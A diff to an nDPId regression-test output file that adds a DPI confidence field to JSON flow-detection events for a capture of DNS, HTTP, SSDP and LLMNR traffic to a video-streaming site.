-00750{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":56,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1470104378901,"flow_last_seen":1470104378905,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1470104378905,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"168.95.1.1","src_port":52723,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Streaming"},"dns": {"query":"kankan.1kxun.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"222.73.254.167"}}
+00776{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":56,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1470104378901,"flow_last_seen":1470104378905,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1470104378905,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"168.95.1.1","src_port":52723,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Streaming"},"dns": {"query":"kankan.1kxun.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"222.73.254.167"}}
 00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":57,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104378906,"flow_last_seen":1470104378906,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1470104378906,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"222.73.254.167","src_port":49598,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":57,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1470104378906,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1470104378906,"pkt":"TF4M6gNlABxCjnAxCABFAAA0Uc5AAIAGmFPAqHMI3kn+p8G+AFDrM0BvAAAAAIACIABRhAAAAgQE7AEDAwgBAQQC"}
 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1470104378906,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1470104378906,"pkt":"TF4M6gNlABxCjnAxCABFAAA0Uc5AAIAGmFPAqHMI3kn+p8G+AFDrM0BvAAAAAIACIABRhAAAAgQE7AEDAwgBAQQC"}
 00516{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1470104378954,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":108,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":108,"pkt_l4_len":74,"ts_msec":1470104378954,"pkt":"ABxCjnAxTF4M6gNlCABFAABeST8AADAR\/Y8ICAgIwKhzCAA1zfMASpHwceWBgAABAAIAAAAABmthbmthbgUxa3h1bgNjb20AAAEAAcAMAAEAAQAAAlcABN5J\/nHADAABAAEAAAJXAATeSf6n"}
-00754{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":59,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1470104377901,"flow_last_seen":1470104378954,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1470104378954,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"8.8.8.8","src_port":52723,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Google","breed":"Acceptable","category":"Streaming"},"dns": {"query":"kankan.1kxun.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"222.73.254.113"}}
+00780{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":59,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1470104377901,"flow_last_seen":1470104378954,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1470104378954,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"8.8.8.8","src_port":52723,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Streaming"},"dns": {"query":"kankan.1kxun.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"222.73.254.113"}}
 00615{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":60,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1470104378967,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"ts_msec":1470104378967,"pkt":"AQBef\/\/6uKxv2MGbCABFAAClQRMAAAQRv2DAqAUy7\/\/\/+vyiB2wAkVLKTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClNUOiB1cm46c2NoZW1hcy11cG5wLW9yZzpkZXZpY2U6SW50ZXJuZXRHYXRld2F5RGV2aWNlOjENCk1hbjogInNzZHA6ZGlzY292ZXIiDQpNWDogMw0KDQo="}
 00611{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":61,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1470104378967,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"ts_msec":1470104378967,"pkt":"AQBef\/\/6SNIkYwreCABFAAChfiAAAAERhWDAqAUp7\/\/\/+tgQB2wAjcOhTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="}
 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":62,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1470104378970,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1470104378970,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0AABAADEGOSLeSf6nwKhzCABQwb6HB4x76zNAcIASFtBGWQAAAgQFtAEBBAIBAwMH"}
-00925{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":65,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104378906,"flow_last_seen":1470104378975,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":420,"flow_tot_l4_payload_len":420,"flow_avg_l4_payload_len":70,"midstream":0,"ts_msec":1470104378975,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"222.73.254.167","src_port":49598,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"kankan.1kxun.com","url":"kankan.1kxun.com\/api\/videos\/alsolikes\/10410.json?callback=jQuery18306855657112319022_1470103242123&_=1470104377899","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows NT 6.1) AppleWebKit\/537.22 (KHTML, like Gecko) Chrome\/25.0.1364.152 Safari\/537.22"}}
+00951{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":65,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104378906,"flow_last_seen":1470104378975,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":420,"flow_tot_l4_payload_len":420,"flow_avg_l4_payload_len":70,"midstream":0,"ts_msec":1470104378975,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"222.73.254.167","src_port":49598,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"kankan.1kxun.com","url":"kankan.1kxun.com\/api\/videos\/alsolikes\/10410.json?callback=jQuery18306855657112319022_1470103242123&_=1470104377899","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows NT 6.1) AppleWebKit\/537.22 (KHTML, like Gecko) Chrome\/25.0.1364.152 Safari\/537.22"}}
 00565{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":69,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104379066,"flow_last_seen":1470104379066,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1470104379066,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"8.8.8.8","src_port":60724,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":69,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1470104379066,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"ts_msec":1470104379066,"pkt":"TF4M6gNlABxCjnAxCABFAAA7UdIAAIARpR\/AqHMICAgICO00ADUAJ9woKZABAAABAAAAAAAAA3BpYwUxa3h1bgNjb20AAAEAAQ=="}
-00735{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":69,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104379066,"flow_last_seen":1470104379066,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1470104379066,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"8.8.8.8","src_port":60724,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Google","breed":"Acceptable","category":"Streaming"},"dns": {"query":"pic.1kxun.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00761{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":69,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104379066,"flow_last_seen":1470104379066,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1470104379066,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"8.8.8.8","src_port":60724,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Streaming"},"dns": {"query":"pic.1kxun.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":70,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1470104379066,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"ts_msec":1470104379066,"pkt":"TF4M6gNlABxCjnAxCABFAAA7UdIAAIARpR\/AqHMICAgICO00ADUAJ9woKZABAAABAAAAAAAAA3BpYwUxa3h1bgNjb20AAAEAAQ=="}
 00556{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":71,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1470104379115,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":137,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":137,"pkt_l4_len":103,"ts_msec":1470104379115,"pkt":"ABxCjnAxTF4M6gNlCABFAAB7GLEAAC4RMAEICAgIwKhzCAA17TQAZ+zhKZCBgAABAAQAAAAAA3BpYwUxa3h1bgNjb20AAAEAAcAMAAEAAQAAAlcABGq7I\/bADAABAAEAAAJXAASAx7rowAwAAQABAAACVwAEgMdvqcAMAAEAAQAAAlcABGq6Ezo="}
-00751{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":71,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1470104379066,"flow_last_seen":1470104379115,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":95,"flow_tot_l4_payload_len":157,"flow_avg_l4_payload_len":52,"midstream":0,"ts_msec":1470104379115,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"8.8.8.8","src_port":60724,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Google","breed":"Acceptable","category":"Streaming"},"dns": {"query":"pic.1kxun.com","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"106.187.35.246"}}
+00777{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":71,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1470104379066,"flow_last_seen":1470104379115,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":95,"flow_tot_l4_payload_len":157,"flow_avg_l4_payload_len":52,"midstream":0,"ts_msec":1470104379115,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"8.8.8.8","src_port":60724,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Streaming"},"dns": {"query":"pic.1kxun.com","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"106.187.35.246"}}
 00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":72,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104379117,"flow_last_seen":1470104379117,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1470104379117,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49599,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":72,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1470104379117,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1470104379117,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UdRAAIAG5o3AqHMIarsj9sG\/AFBFF77fAAAAAIACIADHbwAAAgQE7AEDAwgBAQQC"}
 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":73,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1470104379117,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1470104379117,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UdRAAIAG5o3AqHMIarsj9sG\/AFBFF77fAAAAAIACIADHbwAAAgQE7AEDAwgBAQQC"}
@@ -126,29 +126,29 @@
 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1470104379119,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1470104379119,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UdlAAIAG5ojAqHMIarsj9sHEAFAS7Ia1AAAAAIACIAAxwAAAAgQE7AEDAwgBAQQC"}
 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":84,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104379169,"flow_last_seen":1470104379169,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1470104379169,"l3_proto":"ip6","src_ip":"fe80::e98f:bae2:19f7:6b0f","dst_ip":"ff02::1:3","src_port":54888,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":84,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1470104379169,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":92,"pkt_l4_len":38,"ts_msec":1470104379169,"pkt":"MzMAAQAD\/PiuMpcsht1gAAAAACYRAf6AAAAAAAAA6Y+64hn3aw\/\/AgAAAAAAAAAAAAAAAQAD1mgU6wAmi+DsIAAAAAEAAAAAAAAM5bCP5L2b5bCI5qmfAAD\/AAE="}
-00615{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":84,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104379169,"flow_last_seen":1470104379169,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1470104379169,"l3_proto":"ip6","src_ip":"fe80::e98f:bae2:19f7:6b0f","dst_ip":"ff02::1:3","src_port":54888,"dst_port":5355,"l4_proto":"udp","ndpi": {"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
+00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":84,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104379169,"flow_last_seen":1470104379169,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1470104379169,"l3_proto":"ip6","src_ip":"fe80::e98f:bae2:19f7:6b0f","dst_ip":"ff02::1:3","src_port":54888,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":85,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104379169,"flow_last_seen":1470104379169,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1470104379169,"l3_proto":"ip4","src_ip":"192.168.3.95","dst_ip":"224.0.0.252","src_port":54888,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":85,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1470104379169,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"ts_msec":1470104379169,"pkt":"AQBeAAD8\/PiuMpcsCABFAAA6KxkAAAER6ZbAqANf4AAA\/NZoFOsAJg3d7CAAAAABAAAAAAAADOWwj+S9m+WwiOapnwAA\/wAB"}
-00604{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":85,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104379169,"flow_last_seen":1470104379169,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1470104379169,"l3_proto":"ip4","src_ip":"192.168.3.95","dst_ip":"224.0.0.252","src_port":54888,"dst_port":5355,"l4_proto":"udp","ndpi": {"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
+00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":85,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104379169,"flow_last_seen":1470104379169,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1470104379169,"l3_proto":"ip4","src_ip":"192.168.3.95","dst_ip":"224.0.0.252","src_port":54888,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":86,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":1470104379169,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1470104379169,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0AABAADYGgmJquyP2wKhzCABQwcB6nEL4Juf0WoASchCfpwAAAgQFtAEBBAIBAwMH"}
 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":89,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":3,"flow_last_seen":1470104379170,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1470104379170,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0AABAADYGgmJquyP2wKhzCABQwcSHsZvpEuyGtoASchC7PAAAAgQFtAEBBAIBAwMH"}
 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":92,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":1470104379170,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1470104379170,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0AABAADYGgmJquyP2wKhzCABQwcHaep2g2r0bEYASchAKkwAAAgQFtAEBBAIBAwMH"}
 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":95,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":3,"flow_last_seen":1470104379170,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1470104379170,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0AABAADYGgmJquyP2wKhzCABQwb\/T2SVtRRe+4IASchB7QAAAAgQFtAEBBAIBAwMH"}
 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":98,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":1470104379173,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1470104379173,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0AABAADYGgmJquyP2wKhzCABQwcLBVjGFF\/Pwi4ASchB9IQAAAgQFtAEBBAIBAwMH"}
 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":101,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":3,"flow_last_seen":1470104379173,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1470104379173,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0AABAADYGgmJquyP2wKhzCABQwcMVSXssyIjeXYASchBBHwAAAgQFtAEBBAIBAwMH"}
-00865{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":104,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104379117,"flow_last_seen":1470104379175,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":362,"flow_tot_l4_payload_len":362,"flow_avg_l4_payload_len":60,"midstream":0,"ts_msec":1470104379175,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49600,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"pic.1kxun.com","url":"pic.1kxun.com\/video_kankan\/images\/videos\/18283-jfyj3.jpg","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows NT 6.1) AppleWebKit\/537.22 (KHTML, like Gecko) Chrome\/25.0.1364.152 Safari\/537.22"}}
-00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":105,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104379117,"flow_last_seen":1470104379175,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":361,"flow_tot_l4_payload_len":361,"flow_avg_l4_payload_len":60,"midstream":0,"ts_msec":1470104379175,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49599,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"pic.1kxun.com","url":"pic.1kxun.com\/video_kankan\/images\/videos\/13480-alps.jpg","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows NT 6.1) AppleWebKit\/537.22 (KHTML, like Gecko) Chrome\/25.0.1364.152 Safari\/537.22"}}
